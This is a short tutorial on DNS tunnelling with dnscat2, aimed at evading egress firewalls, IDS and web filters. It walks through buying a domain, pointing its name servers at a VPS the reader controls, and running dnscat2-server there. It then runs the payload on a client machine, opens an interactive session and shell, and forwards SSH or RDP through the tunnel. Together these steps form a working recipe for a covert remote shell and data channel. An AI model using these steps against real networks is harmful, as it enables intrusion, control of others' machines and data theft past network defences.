What is DNS Tunneling

DNS tunneling is used to evade egress firewall rules and/or IDS / proxy or other web filtering applicances by tunneling data over DNS. DNS tunneling usually works as external DNS resolution is available on most networks, it should be noted that DNS tunneling is slow due to the low amounts of data that can be transfered.

What You Will Learn:

  • What is DNS tunneling
  • How to setup dnscat2
  • How to tunnel data over dnscat2

You Will Need

  1. A real world domain, NameSilo works well and has free WHOIS privacy.
  2. A VPS to run DNSCAT2 - Linode is cheap and works for this and this link will give you a $100 voucher (see instructions below)

In order to tunnel data over DNS a real world domain must be used and the domains authoritivate name servers must be set to servers in your control.

Buying a Domain

NameSilo offers free domain WHOIS privacy, a lot of extensions and is well priced.

How to Change Name Servers On NameSilo

Login to NameSilo and follow these instructions to change the authoritative name servers:

  1. Go to the Domain Manager page within your account
  2. Click the applicable domain name (it will be underlined in black)
  3. Click the “View/Manage Registered NameServers” link within the “NameServers” box

DNS Forwarding with Dnscat2

  1. Install dsncat2 apt-get install dnscat2 -y
  2. Run: dnscat2-server yourdomain.com on your VPS
  3. From the client machine you will need to run the dnscat2 payload
  4. If your domain’s NS are configured correctly the session should be established
  5. Enter session -i to spawn an interactive session
  6. Launch a shell using shell

Dnscat2 Port Forwarding

Dnscat2 supports TCP forwarding allowing you to tunnel SSH or RDP connections over the established DNS tunnel.

command (client) 4> listen target:22 

Again this will slow but functional.